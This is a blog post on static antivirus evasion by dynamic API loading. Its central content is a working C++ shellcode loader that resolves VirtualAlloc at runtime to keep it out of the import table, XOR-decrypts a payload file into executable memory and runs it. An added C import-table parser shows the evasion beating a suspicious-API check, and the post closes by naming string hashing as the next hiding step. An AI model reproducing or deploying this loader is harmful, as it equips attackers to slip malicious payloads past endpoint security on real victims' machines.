Dynamic Loading

Core idea of static AV evasion

  1. It mostly comes down to the import table
    Different AV engines use different detection logic, but the import table of a PE file directly reveals which Windows API functions (kernel32 and others) the binary calls. If several "dangerous" functions show up together there (VirtualAlloc, which the loader below needs, is a typical one), the file may be flagged before it ever runs.
    There are two ways to keep those names out of the import table: pack the binary, or resolve the functions at runtime instead of importing them (dynamic loading).

Wrapping the Windows API for evasion (rewriting r3-level functions)

The so-called r3 layer is simply user mode.
r0 is kernel mode, i.e. drivers.

Evasion through wrapping: the wrapper below resolves VirtualAlloc at runtime via GetModuleHandleW/LoadLibraryW and GetProcAddress, so "VirtualAlloc" never appears in the binary's import table; only those three loader functions do.

```cpp
#include <windows.h>
#include <cstring>
#include <iostream>
#include <string>

#include <AXorPlus.h>   // the page's own XOR helper, not a system header

// Wrapper around VirtualAlloc: the address is resolved at runtime with
// GetProcAddress, so "VirtualAlloc" never appears in this binary's import
// table; only GetModuleHandleW / LoadLibraryW / GetProcAddress do.
LPVOID NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
{
    typedef LPVOID(WINAPI *Fn_VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

    // kernel32.dll is always mapped into a user-mode process, so
    // GetModuleHandleW normally succeeds; LoadLibraryW is only a fallback.
    auto hmodule = GetModuleHandleW(L"kernel32.dll");
    if (hmodule == NULL)
    {
        hmodule = LoadLibraryW(L"kernel32.dll");
    }

    auto fn = (Fn_VirtualAlloc)GetProcAddress(hmodule, "VirtualAlloc");
    if (fn == NULL)
    {
        return NULL;
    }
    return fn(lpAddress, dwSize, flAllocationType, flProtect);
}

int main(int argc, char *argv[])
{
    AXorPlus xorPlus{};

    if (argc < 3)
    {
        std::cout << "Usage: " << argv[0] << " <file> <key>" << std::endl;
        return 1;
    }

    auto filePath = argv[1];
    auto key = argv[2];
    std::string output;

    // Decrypt the XOR-encrypted shellcode file straight into memory.
    std::cout << "Decrypting " << filePath << " with key " << key << std::endl;
    xorPlus.XOR2Memory(filePath, output, key, 0);
    std::cout << "Decrypted generated successfully" << std::endl;

    const auto decryptedData = reinterpret_cast<const char *>(output.c_str());
    auto size = output.size();

    // RWX allocation through the wrapper. Note that an RWX region is itself a
    // common memory-scan indicator even when the import table is clean.
    PVOID mem = NewVirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    std::cout << "Allocated memory at " << mem << std::endl;
    if (mem == NULL)
    {
        return 1;
    }

    memcpy(mem, decryptedData, size);
    ((void (*)())mem)();   // jump to the decrypted shellcode
    return 0;
}
```

Here xor is just a plain XOR: XOR2Memory decrypts the payload file with the given key into memory (AXorPlus.h is the page's own helper header, not a standard library).
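To make the import-table claim from the core-idea section concrete, and to show what the wrapper above actually changes, here is an added example that is not part of the original post: a minimal PE import-table walker in plain C, run over two constructed PE32+ images. The first imports VirtualAlloc and CreateThread directly; the second models the wrapper approach, where only GetModuleHandleW, LoadLibraryW and GetProcAddress remain. The `build_pe` builder, the two import sets and the `kSuspicious` list are assumptions made up for this demo; the parser walks the real on-disk structures (IMAGE_IMPORT_DESCRIPTOR, thunk tables, IMAGE_IMPORT_BY_NAME) and builds without `windows.h`.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian field access over a raw PE file image; no <windows.h>, so this builds anywhere. */
static uint16_t rd16(const uint8_t *p, size_t o) { return (uint16_t)(p[o] | p[o + 1] << 8); }
static uint32_t rd32(const uint8_t *p, size_t o) { uint32_t v = 0; for (int i = 0; i < 4; i++) v |= (uint32_t)p[o + i] << (8 * i); return v; }
static uint64_t rd64(const uint8_t *p, size_t o) { return rd32(p, o) | (uint64_t)rd32(p, o + 4) << 32; }
static void wr16(uint8_t *p, size_t o, uint16_t v) { p[o] = v & 0xff; p[o + 1] = v >> 8; }
static void wr32(uint8_t *p, size_t o, uint32_t v) { for (int i = 0; i < 4; i++) p[o + i] = (v >> (8 * i)) & 0xff; }
static void wr64(uint8_t *p, size_t o, uint64_t v) { wr32(p, o, (uint32_t)v); wr32(p, o + 4, (uint32_t)(v >> 32)); }

/* Map an RVA to a file offset through the section table; 0 if no section covers it. */
static size_t rva_to_off(const uint8_t *pe, size_t len, uint32_t rva) {
    uint32_t nt = rd32(pe, 0x3c), sec = nt + 24 + rd16(pe, nt + 20);
    for (uint16_t i = 0; i < rd16(pe, nt + 6); i++, sec += 40) {
        uint32_t va = rd32(pe, sec + 12), raw = rd32(pe, sec + 16), ptr = rd32(pe, sec + 20);
        if (rva >= va && rva < va + raw && ptr + (rva - va) < len) return ptr + (rva - va);
    }
    return 0;
}

/* Walk DataDirectory[1] (imports) and emit "dll!function" per thunk; returns the count.
 * Demo parser: a production scanner must bounds-check every read, since a hostile PE controls all offsets. */
static int list_imports(const uint8_t *pe, size_t len, char out[][64], int max) {
    if (len < 0x40 || pe[0] != 'M' || pe[1] != 'Z') return 0;
    uint32_t nt = rd32(pe, 0x3c);
    if (nt + 0x100 > len || memcmp(pe + nt, "PE\0\0", 4) != 0) return 0;
    int is64 = rd16(pe, nt + 24) == 0x20b;                          /* PE32+ vs PE32 optional header */
    uint32_t imp_rva = rd32(pe, nt + 24 + (is64 ? 112 : 96) + 8);   /* DataDirectory[1].VirtualAddress */
    size_t desc = imp_rva ? rva_to_off(pe, len, imp_rva) : 0;
    int n = 0;
    for (; desc && rd32(pe, desc + 12) && n < max; desc += 20) {    /* IMAGE_IMPORT_DESCRIPTOR, 20 bytes */
        const char *dll = (const char *)pe + rva_to_off(pe, len, rd32(pe, desc + 12));
        uint32_t ilt = rd32(pe, desc) ? rd32(pe, desc) : rd32(pe, desc + 16); /* OriginalFirstThunk, else IAT */
        for (size_t t = rva_to_off(pe, len, ilt); t && n < max; t += is64 ? 8 : 4) {
            uint64_t e = is64 ? rd64(pe, t) : rd32(pe, t);
            if (e == 0) break;
            if (e >> (is64 ? 63 : 31))                                /* import by ordinal */
                snprintf(out[n++], 64, "%s!#%u", dll, (unsigned)(e & 0xffff));
            else                                                      /* IMAGE_IMPORT_BY_NAME: hint, then name */
                snprintf(out[n++], 64, "%s!%s", dll, (const char *)pe + rva_to_off(pe, len, (uint32_t)e) + 2);
        }
    }
    return n;
}

/* Names whose co-occurrence in an import table is the classic in-memory-execution signature the page
 * refers to. Assumed list for this example; real engines keep their own. */
static const char *kSuspicious[] = { "VirtualAlloc", "VirtualProtect", "WriteProcessMemory", "CreateRemoteThread", "CreateThread" };

static int count_suspicious(char imports[][64], int n) {
    int hits = 0;
    for (int i = 0; i < n; i++) {
        const char *fn = strchr(imports[i], '!');
        for (size_t k = 0; fn && k < sizeof kSuspicious / sizeof *kSuspicious; k++)
            if (strcmp(fn + 1, kSuspicious[k]) == 0) hits++;
    }
    return hits;
}

/* Constructed PE32+ image (0x400 bytes, one .rdata section at RVA 0x1000 / file offset 0x200) that
 * imports the given functions from kernel32.dll by name. Headers are minimal; it is not loadable. */
static size_t build_pe(uint8_t *pe, const char **funcs, int n) {
    const uint32_t rva = 0x1000, off = 0x200;
    memset(pe, 0, 0x400);
    pe[0] = 'M'; pe[1] = 'Z'; wr32(pe, 0x3c, 0x80);                          /* e_lfanew */
    memcpy(pe + 0x80, "PE\0\0", 4);
    wr16(pe, 0x84, 0x8664); wr16(pe, 0x86, 1); wr16(pe, 0x94, 0xF0);          /* x64, 1 section, opt hdr size */
    wr16(pe, 0x98, 0x20b); wr32(pe, 0x98 + 108, 16);                          /* PE32+ magic, 16 directories */
    wr32(pe, 0x110, rva); wr32(pe, 0x114, 40);                                /* DataDirectory[1] = imports */
    memcpy(pe + 0x188, ".rdata", 6); wr32(pe, 0x188 + 8, 0x200);              /* section header: VirtualSize */
    wr32(pe, 0x188 + 12, rva); wr32(pe, 0x188 + 16, 0x200); wr32(pe, 0x188 + 20, off);
    uint32_t cur = 40, ilt = cur, iat, dll;                                   /* descriptor + null descriptor first */
    cur += (n + 1) * 8; iat = cur; cur += (n + 1) * 8;
    dll = cur; memcpy(pe + off + cur, "kernel32.dll", 13); cur += 13;
    for (int i = 0; i < n; i++) {                                             /* hint (0) + name, both thunk tables */
        wr64(pe, off + ilt + 8 * i, rva + cur); wr64(pe, off + iat + 8 * i, rva + cur);
        memcpy(pe + off + cur + 2, funcs[i], strlen(funcs[i]) + 1); cur += 3 + (uint32_t)strlen(funcs[i]);
    }
    wr32(pe, off, rva + ilt); wr32(pe, off + 12, rva + dll); wr32(pe, off + 16, rva + iat);
    return 0x400;
}

/* Build a sample and parse it back the way a scanner would; returns suspicious hits, *n_out the import count. */
int scan_sample(const char **funcs, int n, int *n_out) {
    static uint8_t pe[0x400]; char imports[32][64];
    size_t len = build_pe(pe, funcs, n);
    int cnt = list_imports(pe, len, imports, 32);
    for (int i = 0; i < cnt; i++) printf("  %s\n", imports[i]);
    if (n_out) *n_out = cnt;
    return count_suspicious(imports, cnt);
}

/* Constructed import sets: the loader calling the APIs directly, and the same loader after wrapping. */
const char *kDirect[] = { "VirtualAlloc", "CreateThread", "WaitForSingleObject", "ExitProcess" };
const char *kDynamic[] = { "GetModuleHandleW", "LoadLibraryW", "GetProcAddress", "ExitProcess" };

int main(void) {
    int n, hits;
    printf("direct imports:\n");  hits = scan_sample(kDirect, 4, &n);  printf("  -> %d/%d suspicious\n", hits, n);
    printf("dynamic imports:\n"); hits = scan_sample(kDynamic, 4, &n); printf("  -> %d/%d suspicious\n", hits, n);
    return 0;
}
```

The wrapped sample scores zero against the import-table rule, which is the whole point of the technique. Two tells remain, though: the import table still shows LoadLibraryW plus GetProcAddress, which many engines weight on its own, and the literal "VirtualAlloc" that the wrapper passes to GetProcAddress still sits in .rdata as a plain string, so a string scan finds it even when the import table does not. Hiding that name (hashing it, or decrypting it just before the call) is the next step beyond what this page shows.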


Source: https://tsy244.github.io/2024/11/03/免杀/动态加载/
Author: August Rosenberg
Posted on November 3, 2024